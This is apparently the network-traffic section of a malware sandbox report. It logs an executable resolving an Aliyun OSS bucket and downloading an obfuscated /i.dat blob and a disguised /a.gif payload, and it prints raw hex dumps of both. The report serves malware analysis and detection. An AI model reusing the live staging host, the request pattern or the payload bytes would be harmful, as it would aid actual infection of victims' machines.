                                    Jan 12, 2025 04:06:06.460844994 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.460844994 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.461275101 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.461402893 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.462363958 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.462474108 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.466875076 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.467086077 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.551017046 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.551182032 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.551601887 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.551671028 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.551965952 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.552067995 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.552591085 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.552661896 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.552685976 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.552757025 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.553715944 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.553805113 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.555506945 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.555577993 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.555840969 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.555900097 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.557796001 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.557862043 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.641628027 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.641768932 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.641769886 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.641798973 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.641844034 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.641844034 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.642090082 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.642193079 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.642210007 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.642218113 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.642275095 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.642275095 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.642719030 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.642807007 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.642811060 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.642832994 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.642865896 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.643069983 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.643419981 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.643512964 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.643567085 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.643567085 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.643573046 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.643598080 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.643625021 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.643630028 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.643656015 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.643697977 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644339085 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644412994 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644448042 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644516945 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644532919 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644643068 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644643068 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644665956 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.644706964 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.644706964 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.645967960 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.646250010 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.648142099 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.648219109 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.648226976 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.648240089 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.648284912 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.648284912 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732367992 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732481003 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732485056 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732502937 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732553005 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732553005 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732563972 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732646942 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.732656002 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.732712984 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.747618914 CET49983443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.747634888 CET4434998347.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.774049044 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.774075985 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:06.774306059 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.774444103 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:06.774460077 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.100358009 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.100459099 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.101094007 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.101094007 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.101105928 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.101120949 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480724096 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480778933 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480834007 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.480849028 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.480911016 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.480911016 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.481077909 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.481170893 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.482630968 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.482708931 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.482722998 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.482769966 CET4434998447.101.26.25192.168.2.5
                                    Jan 12, 2025 04:06:08.482790947 CET49984443192.168.2.547.101.26.25
                                    Jan 12, 2025 04:06:08.482841969 CET49984443192.168.2.547.101.26.25

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 12, 2025 04:06:00.148108006 CET5382353192.168.2.51.1.1.1
                                    Jan 12, 2025 04:06:00.716351032 CET53538231.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 12, 2025 04:06:00.148108006 CET192.168.2.51.1.1.10x3aeaStandard query (0)jcoiw1.oss-cn-shanghai.aliyuncs.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 12, 2025 04:06:00.716351032 CET1.1.1.1192.168.2.50x3aeaNo error (0)jcoiw1.oss-cn-shanghai.aliyuncs.comsc-2wln.cn-shanghai.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 12, 2025 04:06:00.716351032 CET1.1.1.1192.168.2.50x3aeaNo error (0)sc-2wln.cn-shanghai.oss-adns.aliyuncs.comsc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                    Jan 12, 2025 04:06:00.716351032 CET1.1.1.1192.168.2.50x3aeaNo error (0)sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com47.101.26.25A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • jcoiw1.oss-cn-shanghai.aliyuncs.com

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.54998147.101.26.254436504C:\Users\user\Desktop\1387457-38765948.15.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-12 03:06:02 UTC107OUTGET /i.dat HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-12 03:06:02 UTC558INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:02 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 512
                                    Connection: close
                                    x-oss-request-id: 6783319A2E2F7835342EDFD1
                                    Accept-Ranges: bytes
                                    ETag: "FF6D9354842B497B290F2E5509598F49"
                                    Last-Modified: Sat, 11 Jan 2025 10:54:12 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 12504110949063718454
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: /22TVIQrSXspDy5VCVmPSQ==
                                    x-oss-server-time: 3
                                    2025-01-12 03:06:02 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 5a 53 5f 59 2e 68 77 36 45 45 1b 55 3b 78 26 3d 5c 53 5a 55 34 3c 7b 34 58 5d 4d 41 2f 22 32 6f 0c 00 02 40 21 6e 27 29 4f 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 41 5d 5d 59 2a 63 76 76 1c 15 19 1f 68 2e 31 70 03 03 5d 13 7d 3e 60 7b 1a 15 1c 13 72 7a 3d 72 1e 1b 0b 07 69 64 74 29 4a 46 44 06 64 28 61 6f 09 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 6f 07 1b 1b 1f 6c 25 30 30 5a 53 5f 59 2e 68 77 36 45 45 1b 55 3b 78 26 3d 5c 53 5a 55 34 3c 7b 34 58 5d 4d 41 2f 22 32 6f 0c 00 02 40 23 6e 27 29 4f 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 41 5d 5d 59 2a 63 76 76 1c 15 19 1f 68 2e 31
                                    Data Ascii: l%00ZS_Y.hw6EEU;x&=\SZU4<{4X]MA/"2o@!n')O)))))))))))))))))))))))))))))))A]]Y*cvvh.1p]}>`{rz=ridt)JFDd(aooooooooooooooooooooooooooooooool%00ZS_Y.hw6EEU;x&=\SZU4<{4X]MA/"2o@#n')O)))))))))))))))))))))))))))))))A]]Y*cvvh.1


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.54998247.101.26.254436504C:\Users\user\Desktop\1387457-38765948.15.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-12 03:06:04 UTC107OUTGET /a.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-12 03:06:04 UTC545INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:04 GMT
                                    Content-Type: image/gif
                                    Content-Length: 135589
                                    Connection: close
                                    x-oss-request-id: 6783319C5C5A72323020629F
                                    Accept-Ranges: bytes
                                    ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                    Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 8642451798640735006
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000103
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                    x-oss-server-time: 1
                                    2025-01-12 03:06:04 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-12 03:06:04 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                    Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                    2025-01-12 03:06:04 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                    Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                    2025-01-12 03:06:04 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                    Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                    2025-01-12 03:06:04 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                    2025-01-12 03:06:04 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                    2025-01-12 03:06:04 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                    2025-01-12 03:06:04 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                    2025-01-12 03:06:04 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                    Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                    2025-01-12 03:06:04 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                    Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.54998347.101.26.254436504C:\Users\user\Desktop\1387457-38765948.15.exe
